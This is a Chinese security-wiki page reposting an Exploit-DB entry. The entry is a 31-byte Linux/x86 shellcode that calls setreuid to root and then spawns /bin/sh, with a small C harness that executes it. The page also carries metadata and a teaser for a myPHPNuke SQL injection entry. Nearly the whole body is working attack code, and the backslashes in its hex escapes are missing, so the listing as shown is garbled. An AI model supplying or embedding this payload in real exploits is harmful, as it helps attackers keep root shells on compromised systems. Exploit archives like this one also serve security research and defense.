Linux/x86 – setreuid() + execve() Shellcode (31 bytes)

Linux/x86 – setreuid() + execve() Shellcode (31 bytes)

漏洞ID 1054847 漏洞类型
发布时间 2004-12-26 更新时间 2004-12-26
图片[1]-Linux/x86 – setreuid() + execve() Shellcode (31 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – setreuid() + execve() Shellcode (31 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13417
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 31 byte setreuid() shellcode - # man shadow
* os: Slackware 9.1, Phlak 2.4, Knoppix 0.1
*
* www.manshadow.org
* [email protected]
* irc.efnet.net #_man_shadow
*/

char shellcode[] =
"x31xC9"              /* xor ecx,ecx     */
"x31xDB"              /* xor ebx,ebx     */
"x6Ax46"              /* push byte 70    */
"x58"                  /* pop eax         */
"xCDx80"              /* int 80h         */
"x51"                  /* push ecx        */
"x68x2Fx2Fx73x68"  /* push 0x68732F2F */
"x68x2Fx62x69x6E"  /* push 0x6E69622F */
"x89xE3"              /* mov ebx,esp     */
"x51"                  /* push ecx        */
"x53"                  /* push ebx        */
"x89xE1"              /* mov ecx,esp     */
"x99"                  /* cdq             */
"xB0x0B"              /* mov al,11       */
"xCDx80";             /* int 80h         */

int main(int argc, char *argv[]) {
       void (*sc)() = (void *)shellcode;
       printf("len:%dn", strlen(shellcode));
       sc();
       return 0;
}

// milw0rm.com [2004-12-26]

相关推荐: myPHPNuke 1.8.8 – ‘auth.inc.php’ SQL Injection

myPHPNuke 1.8.8 – ‘auth.inc.php’ SQL Injection 漏洞ID 1054176 漏洞类型 发布时间 2003-09-20 更新时间 2003-09-20 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享